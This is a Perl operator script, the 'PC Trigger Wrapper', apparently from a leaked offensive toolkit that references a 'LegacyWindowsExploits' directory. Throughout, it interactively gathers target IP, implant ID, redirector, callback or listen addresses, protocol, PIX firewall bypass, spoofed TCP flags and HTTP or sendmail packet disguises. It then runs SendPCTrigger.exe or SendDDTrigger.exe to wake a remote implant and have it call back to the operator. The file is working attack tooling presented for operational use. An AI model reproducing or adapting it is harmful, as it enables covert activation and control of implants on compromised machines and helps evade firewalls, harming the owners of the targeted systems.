use strict; use vars qw($VERSION); $::VERSION = "PC Trigger Wrapper: Version 1.5.1"; print "$::VERSION\n\n"; use FindBin; use lib "$FindBin::Bin"; use Getopt::Long; use Cwd; use lib "$FindBin::Bin\\..\\..\\..\\..\\LegacyWindowsExploits\\Resources\\Perl"; use ExploitUtils qw( $EU_LOGFILE $EU_VERBOSE $EU_BATCHMODE EU_LogInit EU_Log EU_ExitMessage EU_GetChoice EU_GetInput EU_GetExistingDir EU_GetIP EU_GetLocalIP EU_GetRootDir EU_GetPort EU_RunCommand EU_GetAddr ); use vars qw($REGPROBE $RIDEAREA $PAYLOAD $CIEXE $RPCTOUCH @DEPFILES); my %opts = (); GetOptions(\%opts, "v", "h", "q|?", "b", "e=s", "d=s", "t=s", "c=s") or &print_script_usage(0); if (scalar(@ARGV) > 0 ) { &EU_Log(1, "Extraneous arguments found on command line: @ARGV"); &EU_Log(1, "Arguments will be ingnored"); while(@ARGV) {shift;} } if (!defined($opts{"e"})) { &EU_Log(1, "A -e option must be supplied."); &print_usage(0); } $::SEND_PC_TRIGGER = "Resources\\PC\\Tools\\SendPCTrigger.exe"; $::SEND_DD_TRIGGER = "Resources\\PC\\Tools\\SendDDTrigger.exe"; @DEPFILES = ($::SEND_PC_TRIGGER, $::SEND_DD_TRIGGER); my $work_dir = "E:\\"; my $root_dir = "$FindBin::Bin\\..\\.."; my $logfile_prefix = "pctrigger_"; my $logfile_suffix = "_script.log"; my $TargetIp = 0; &print_usage(1) if (defined $opts{"h"}); &print_usage(0) if (defined $opts{"q"}); $ExploitUtils::EU_VERBOSE = 1 if (defined $opts{"v"}); $ExploitUtils::EU_BATCHMODE = 1 if (defined $opts{"b"}); $work_dir = $opts{"d"} if (defined $opts{"d"}); $root_dir = $opts{"c"} if (defined $opts{"c"}); $TargetIp = $opts{"t"} if (defined $opts{"t"}); if ($ENV{"OS"} ne "Windows_NT") { &EU_ExitMessage(1,"This script requires Windows NT or Windows 2000"); } $work_dir = &EU_GetExistingDir("Enter pathname for operation's working directory", $work_dir, 1); $root_dir = &EU_GetRootDir($root_dir,@::DEPFILES); &EU_LogInit($logfile_prefix, $logfile_suffix, $work_dir); &EU_Log(0,"$::VERSION"); &EU_Log(0,"\nChanging to working directory: $work_dir"); chdir $work_dir || &EU_ExitMessage(1,"Unable to change to working directory: $work_dir"); my $cmd = &validate_parms($root_dir, $TargetIp); my $cur_dir = cwd(); my $answer; if(!$EU_BATCHMODE) { $answer = &EU_GetInput("\nReady to send trigger ([y],n,quit)? ", "y"); &EU_ExitMessage(0,"User terminated script") if ($answer ne "y" and $answer ne "Y"); } &EU_Log(1, "Running command: $cmd"); &EU_RunCommand($cmd); chdir $cur_dir || &EU_ExitMessage(1,"Unable to switch back to initial directory: $cur_dir"); &EU_ExitMessage(0,"\nDone with $::0."); sub print_usage() { my ($verbose) = @_; print "$::VERSION\n"; print qq~ Usage: $::0 [-v] [-h] [-?] [-b] [-d ] [-e ] [-t ] ~; if ($verbose) { print qq~ -v verbose mode. Default non-verbose mode. -h Print this help information. -? Print abbreviated help information. -b Batch (non-interactive) mode. Default interactive mode. -d Working Directory Top-level directory where operation\'s files will be generated. Default E:\. -e Exploits Directory Top-level directory containing exploit files. Default one directory up from directory containing this script. -t Target IP address. Default derived as last part of working directory name. ~; } &EU_ExitMessage(1,"End of help."); } sub validate_parms() { my ($root_dir, $TargetIp) = @_; my ($cmd, $args); while (1) { $cmd = ""; $args = ""; my $redirectFlag; my $retcode = &EU_GetInput("\nWill this operation be REDIRECTED (y,[n])? ", "n"); if( ($retcode eq "y") or ($retcode eq "Y") ) { $redirectFlag = 1; } else { $redirectFlag = 0; } $TargetIp = &EU_GetIP("\nEnter the Target's IP address", $TargetIp); my $finalDestIp = &EU_GetIP("\nEnter the final destination IP address", $TargetIp); my $LocalIp = &EU_GetLocalIP("Enter the Local IP address", undef); my $SourceIp = &EU_GetIP("\nEnter the Source IP address", $LocalIp); $args = $args . " -sourceaddress $SourceIp"; my $TargetId; while (!defined($TargetId)) { my $id = &EU_GetInput("\nEnter the Target's PC ID: ", ""); if ($id =~ /^(0x){0,1}[0-9]+$/) { $TargetId = $id; } else { &EU_Log(1, "\nThe given ID must be number\n"); } } $args = $args . " -id $TargetId"; my ($RedirectIp, $RedirectPort); if ($redirectFlag == 1) { $RedirectIp = &EU_GetIP("\nEnter the Redirection IP address", ""); $RedirectPort = &EU_GetPort("\nEnter the Redirection port"); $args = $args . " -redirect $RedirectIp $RedirectPort"; } my @triggerChoices = ( {name => "PeddleCheap ICMP"}, {name => "CordialFlimsy"}); my $pTriggerChoice = &EU_GetChoice("Pick the trigger type", 2, @triggerChoices); if ($pTriggerChoice == undef) { &EU_ExitMessage(1,"User terminated script\n"); } my @protoChoices = ( {name => "icmp", default0 => 8, default1 => 0 }, {name => "tcp", default0 => 0, default1 => 80 }, {name => "udp", default0 => 0, default1 => 53 }); my @firewallChoices = ( {name => "NONE", args => ""}, {name => "PIX", args => " -firewall pix"} ); my @formatChoices = ( {name => "NONE", args => ""} ); my $callback; if ($$pTriggerChoice{name} eq "PeddleCheap ICMP") { $callback = 1; } else { my @actionChoices = ( {name => "Callback"}, {name => "Listen"}); my $pActionChoice = &EU_GetChoice("Pick the trigger action", 1, @actionChoices); if ($pActionChoice == undef) { &EU_ExitMessage(1,"User terminated script\n"); } if ($$pActionChoice{name} eq "Callback") { $callback = 1; } else { $callback = 0; } } my $actionIp; my $actionSrcPort; my $actionDstPort; my $actionTime; if ($callback) { $actionIp = &EU_GetIP("\nEnter the CALLBACK IP address", $LocalIp); $actionSrcPort = &EU_GetPort("\nEnter the callback source port", 0); $actionDstPort = &EU_GetPort("\nEnter the callback destination port", 0); $args = $args . " -callback $actionIp $actionDstPort $actionSrcPort"; } else { $actionIp = &EU_GetIP("\nEnter the LISTEN bind address", ""); $actionSrcPort = &EU_GetPort("\nEnter the LISTEN port", 1934); $actionTime = &EU_GetPort("\nEnter the LISTEN time (in seconds)", 0); $args = $args . " -listen $actionIp $actionSrcPort $actionTime"; } my $pChoice; my $pFirewallChoice; my ($timestamp, $tcpConnect, $sendTo, $sendFrom, $tcpFlags); my ($pFormatChoice, $webpage, $action, $domain, $userAgent); if ($$pTriggerChoice{name} eq "PeddleCheap ICMP") { $pChoice = $protoChoices[0]; $cmd = $::SEND_PC_TRIGGER; } else { $cmd = $::SEND_DD_TRIGGER; $pChoice = &EU_GetChoice("Pick the trigger type", 2, @protoChoices); if ($pChoice == undef) { &EU_ExitMessage(1,"User terminated script\n"); } $args = $args . " -protocol $$pChoice{name}"; # get keyfile for encryption my $keyFile = "$root_dir\\Resources\\PC\\Keys\\Default\\private_key.bin"; $keyFile = &EU_GetInput("Enter the private key location [$keyFile]: ", $keyFile); $args = $args . " -keyfile \"$keyFile\""; # get timestamp my $val; if ($TargetId == 0) { # timestamp must be given $val = "y"; } else { $val = &EU_GetInput("Timestamp the trigger packet ([y],n,quit)? ", "y"); } if (($val eq "y") || ($val eq "Y")) { while (1) { my ($sec,$min,$hour,$mday,$mon,$year,$extra) = gmtime(); my $currentTime = sprintf("%02u/%02u/%04u %02u:%02u:%02u", $mon+1, $mday, $year+1900, $hour, $min, $sec); $timestamp = &EU_GetInput("Enter timestamp [$currentTime]: ", "$currentTime"); if ($timestamp =~ /^[0-9]{1,2}\/[0-9]{1,2}\/[0-9]{4} [0-9]{1,2}:[0-9]{1,2}:[0-9]{1,2}$/) { last; } else { &EU_Log(1, "Given timestamp is invalid ($timestamp)\n"); } } $args = $args . " -timestamp \"$timestamp\""; } # firewall bypass $pFirewallChoice = &EU_GetChoice("Pick the firewall bypass type", 1, @firewallChoices); if ($pFirewallChoice == undef) { &EU_ExitMessage(1,"User terminated script\n"); } $args = $args . $$pFirewallChoice{args}; # tcp connect if ($$pChoice{name} eq "tcp") { $val = &EU_GetInput("Perform a full TCP connection (y,[n])? ", "n"); push @formatChoices, { name => "Http", args => " -format Http"}; if (($val eq "y") || ($val eq "Y")) { $tcpConnect = "YES"; $args = $args . " -tcpconnect"; push @formatChoices, { name => "SendMail", args => " -format sendmail"}; } else { $tcpConnect = "NO"; # change tcp flags while ($tcpFlags == undef) { $val = &EU_GetInput("Enter comma seperated TCP flags [ack] : ", "ack"); if ($val =~ /^((syn|fin|rst|push|ack|urg),)*(syn|fin|rst|push|ack|urg){1}$/) { $tcpFlags = $val; $args = $args . " -tcpflags $tcpFlags"; last; } else { &EU_Log(1, "Invalid tcp flags (valid flags include: syn, fin, rst, push, ack, urg)"); } } } } $pFormatChoice = &EU_GetChoice("Pick the packet format", 1, @formatChoices); if($pFormatChoice == undef) { &EU_ExitMessage(1,"User terminated script\n"); } $args = $args . $$pFormatChoice{args}; if(lc $$pFormatChoice{name} eq "http") { $userAgent = "Mozilla 4.0 (compatible)"; $domain; $webpage = "/"; my @actionChoices = ( {name => "Get Action", args => " -action GET"}, {name => "Post Action", args => " -action POST"} ); $userAgent = &EU_GetInput("Enter the user-agent [$userAgent] : ", $userAgent); while (!defined($domain)) { my $td = &EU_GetInput("Enter the domain : ", ""); if(!($td eq "")) { $domain = $td; } } $webpage = &EU_GetInput("Enter the webpage [$webpage] : ", $webpage); if($webpage =~ /^[^\/].*$/ && $domain =~ /^.*[^\/]$/) { $webpage = "/$webpage"; } my $pActionChoice = &EU_GetChoice("Pick the HTTP action", 1, @actionChoices); if($pActionChoice == undef) { &EU_ExitMessage(1, "User terminated script\n"); } $args = $args . $$pActionChoice{args} . " -useragent \"$userAgent\" -domain \"$domain\" -webpage \"$webpage\""; $action = $$pActionChoice{name}; } # send-addresses $val = &EU_GetInput("Provide send-to/send-from addresses (y,[n])? ", "n"); if (($val eq "y") || ($val eq "Y")) { $sendTo = &EU_GetInput("Provide send-to address : ", ""); $sendFrom = &EU_GetInput("Provide send-from address : ", ""); $args = $args . " -send-addresses \"$sendTo\" \"$sendFrom\""; } } if ($$pChoice{name} eq "icmp") { $$pChoice{default0} = &EU_GetPort("\nEnter the ICMP type", $$pChoice{default0}); $$pChoice{default1} = &EU_GetPort("\nEnter the ICMP code", $$pChoice{default1}); if ($$pTriggerChoice{name} eq "PeddleCheap ICMP") { $args = $args . " -target $TargetIp $finalDestIp -icmp-options $$pChoice{default0} $$pChoice{default1}"; } else { $args = $args . " -target $TargetIp -icmp-options $$pChoice{default0} $$pChoice{default1} -destIp $finalDestIp"; } } else { $$pChoice{default0} = &EU_GetPort("\nEnter the source port", $$pChoice{default0}); $$pChoice{default1} = &EU_GetPort("\nEnter the destination port", $$pChoice{default1}); $args = $args . " -target $TargetIp $$pChoice{default1} $$pChoice{default0} -destIp $finalDestIp"; } &EU_Log(1,"\nConfirm Network Parameters:\n"); &EU_Log(1,"Root Directory : $root_dir"); if( $redirectFlag ) { &EU_Log(1,"Using Redirection : True"); &EU_Log(1,"Redirector IP : $RedirectIp"); &EU_Log(1,"Redirector Port : $RedirectPort"); } else { &EU_Log(1,"Using Redirection : False"); } &EU_Log(1,"Target IP : $TargetIp"); &EU_Log(1,"Protocol : $$pChoice{name}"); &EU_Log(1,"Source IP : $SourceIp"); if ($callback) { &EU_Log(1,"Callback IP : $actionIp"); &EU_Log(1,"Callback Src Port : $actionSrcPort"); &EU_Log(1,"Callback Dst Port : $actionDstPort"); } else { &EU_Log(1,"Listen bind IP : $actionIp"); &EU_Log(1,"Listen Port : $actionSrcPort"); &EU_Log(1,"Listen Time : $actionTime"); } &EU_Log(1,"Type : $$pTriggerChoice{name} ($$pChoice{name})"); if ($$pChoice{name} eq "icmp") { &EU_Log(1,"ICMP type : $$pChoice{default0}"); &EU_Log(1,"ICMP code : $$pChoice{default1}"); } else { &EU_Log(1,"Target Src Port : $$pChoice{default0}"); &EU_Log(1,"Target Dst Port : $$pChoice{default1}"); } &EU_Log(1,"Target ID : $TargetId"); if (defined($timestamp)) { &EU_Log(1,"Timestamp : $timestamp"); } if (defined($pFirewallChoice)) { &EU_Log(1,"Firewall Bypass : $$pFirewallChoice{name}"); } if (defined($tcpConnect)) { &EU_Log(1,"Full TCP Connection : $tcpConnect"); } if (defined($tcpFlags)) { &EU_Log(1,"TCP flags : $tcpFlags"); } if (defined($sendTo) && defined($sendFrom)) { &EU_Log(1,"Send-To Address : $sendTo"); &EU_Log(1,"Send-From Address : $sendFrom"); } if (defined($pFormatChoice)) { &EU_Log(1,"Format : " . $$pFormatChoice{name}); } if (defined($action) && defined($webpage) && defined($userAgent) && defined($domain)) { &EU_Log(1,"Action : $action"); &EU_Log(1,"Domain : $domain"); &EU_Log(1,"Webpage : $webpage"); &EU_Log(1,"User-Agent : $userAgent"); } my $okay = &EU_GetInput("\nContinue with the current values ([y],n,quit)? ","y"); &EU_Log(0, "\nContinue with the current values ([y],n,quit)? $okay"); if( ($okay eq "quit") or ($okay eq "QUIT") or ($okay eq "q") or ($okay eq "Q") ) { &EU_ExitMessage(1,"User terminated script\n"); } elsif( ($okay eq "n") or ($okay eq "N") ) { &EU_Log(1, "Returning to top of script...\n"); next; } elsif( ($okay eq "y") or ($okay eq "Y") ) { last; } } return ("\"$root_dir\\$cmd\"" . $args); } __END__